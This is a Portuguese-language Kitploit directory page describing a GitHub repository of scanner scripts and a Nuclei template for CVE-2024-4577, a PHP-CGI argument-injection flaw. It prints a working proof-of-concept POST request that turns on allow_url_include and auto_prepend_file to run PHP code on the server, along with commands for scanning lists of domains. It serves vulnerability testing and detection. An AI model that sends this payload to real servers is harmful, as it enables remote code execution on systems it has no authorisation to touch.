Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577-PHP-RCE — PoC de RCE em PHP para CVE-2024-4577 escrito em bash, go, python e um template nuclei | Kitploit
Ferramentas/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PoC de RCE em PHP para CVE-2024-4577 escrito em bash, go, python e um template nuclei

Ver Repositório
33136há 2 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PHP RCE PoC

CVE-2024-4577: Injeção de Argumentos no PHP-CGI

Visão Geral

Este repositório contém scripts para verificar a vulnerabilidade CVE-2024-4577, um problema de injeção de argumentos no PHP-CGI. Você pode usar os scripts Bash, Go e Python fornecidos para testar uma lista de domínios quanto a essa vulnerabilidade. Também publiquei um arquivo YAML para Nuclei.

Uso

Script Bash

Para usar o script Bash, execute o seguinte comando:

./CVE-2024-4577.sh /caminho/para/lista-de-dominios

Script Go

Primeiro, salve o script Go em um arquivo chamado CVE-2024-4577.go. Para compilar e executar o script Go:

  1. Compile o script Go em um binário:

    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  2. Execute o binário com o arquivo de lista de domínios como argumento:

    ./CVE-2024-4577 /caminho/para/lista-de-dominios
    

Script Python

Primeiro, salve o script Python em um arquivo chamado CVE-2024-4577.py. Para executar o script Python:

  1. Certifique-se de ter a biblioteca requests instalada:

    pip install requests
    
  2. Execute o script Python com o arquivo de lista de domínios como argumento:

    python CVE-2024-4577.py /caminho/para/lista-de-dominios
    
  3. (Opcional) Se desejar exibir apenas hosts vulneráveis:

    python CVE-2024-4577.py /caminho/para/lista-de-dominios --quiet
    

Prova de Conceito (PoC) Explicada

Para testar manualmente a vulnerabilidade, você pode enviar a seguinte requisição POST:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Template Nuclei

Também criei um template Nuclei para escanear instâncias vulneráveis; ele usa o esquema de layout v3 e foi testado em ambiente de laboratório:

nuclei -t CVE-2024-4577.yaml -u <url-alvo>

Exemplo de Lista de Domínios

A lista de domínios deve ser prefixada com http/https para garantir que sejam lidos corretamente.

http://example.com
http://testsite.com
http://vulnerablesite.com

Exemplo de Saída

Se um domínio for considerado vulnerável, a saída será:

http://example.com: Vulnerável
http://vulnerablesite.com: Vulnerável
Baixar ferramenta